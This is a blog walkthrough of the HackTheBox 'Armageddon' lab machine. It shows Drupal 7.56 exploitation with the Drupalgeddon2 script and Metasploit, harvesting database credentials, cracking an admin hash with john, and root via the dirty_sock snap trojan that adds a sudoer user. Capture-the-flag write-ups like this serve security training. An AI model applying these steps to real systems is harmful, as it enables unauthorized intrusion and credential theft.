HackTheBox: (“Armageddon”) — Walkthrough

Mohamed Elmasry
5 min readJul 24, 2021

Hi People :D

Today we gonna solve “Armageddon” machine from HackTheBox, an easy machine that focuses on Drupal exploitation and snap privilege escalation, let’s get started :D


— — — — — —

Start with Nmap

nmap -A

We have two open ports (22/80) and we know from the results that the website on port 80 running Drupal 7, so let’s navigate to it

Web Enumeration
— — — — — — — —

We have a simple register&login function but we can’t create a new account because the e-mail cannot be sent as the website says: “Unable to send e-mail …

Let’s move to the next step.. fuzzing directories.

We have a lot of files but /profiles/testing/testing.info is the most important one ( I used the Dirsearch tool to perform the fuzzing process )

./dirsearch -u -e "*" -i 200

In the testing.info file, we have the exact version of Drupal (“7.56”) and now we can make sure that the website running Drupal 7.56

Drupal is a free and open-source web content management framework written in PHP ( more information Here ).

Let’s search for exploitation, I found This GitHub Repo that contains an automatic exploitation script

— — — — — —

Let’s download this repo using:

git clone https://github.com/dreadlocked/Drupalgeddon2.gitcd Drupalgeddon2/

Then run the script using:


And we easily got an apache user shell ☺

OR you can use This Metasploit Module

First use the module then set the options for it:

use exploit/unix/webapp/drupal_drupalgeddon2set RHOSTS LHOST tun0


We got an apache user shell from Metasploit successfully ☺

User Flag
— — — — —

After you get the apache shell, move to /var/www/html/sites/default directory, there are two PHP scripts that have a drupaluser credentials ( drupaluser:CQHEy@9M*m23gBVj )

You can grep for these creds using:

cat * | grep username && cat * | grep password

These creds work with MySQL database, so let’s try to find any passwords or hashes.

First, login to MySQL service using:

mysql -u drupaluser -h localhost -p CQHEy@9M*m23gBVj

Then list all databases using:


Second, use the drupal database with use drupal;, then list all tables using:


We have a users table which probably contains the user's hashes

The last step is to dumb the users table contains using:

select * from users;

There’s the brucetherealadmin hash in the users table ( $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt )

Let’s try to crack this hash, first put the hash into a file called hash then use the john tool with rockyou wordlist to start the cracking process

Wait for the tool to finish the cracking process then execute john hash --show to see the result.

The hash successfully cracked and the password is booboo

We can now SSH into brucetherealadmin using:

ssh brucetherealadmin@ 
pass: booboo

And we finally found the user flag ☺

Root Flag

— — — — —

Execute sudo-l command, you’ll see that you can run snap install as root without password and the machine is running snap 2.47.1–1.el7

After some searching, I found This GitHub Repo that talks about exploiting privilege escalation using snap by installing an empty devmode snap that adds a new user to the local system, this user will have permissions to execute sudo commands

We gonna use only the trojan part from dirty_sockv2.py.

But before we use it, we must know what it does first, right? It’s encoded by Base64 so let’s decode It

It’s adding a new user called dirty_sock with his hash using useradd and makes it one of the Sudoers by using usermod and gives him full permission with the echo command, the rest of the data is required for the snap package.

Now let’s copy this trojan and remove all spaces from it then put it into a file called exp.snap after decoding it using python and piping as following:

Run this command on the machine and execute sudo /usr/bin/snap install --devmode exp.snap

Now we’ve successfully installed the snap package so let’s see if it works, run su dirty_sock it will ask for a password and it’s dirty_sock

Then run sudo -i command and write the password again ( dirty_sock ), you’ll get the root privilege and you can easily get the root flag ☺

Thanks for reading and I hope you love this writeup ❤.

You can give me a Respect on my HackTheBox Account (if you want :D).

Facebook TwitterLinkedIn



Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter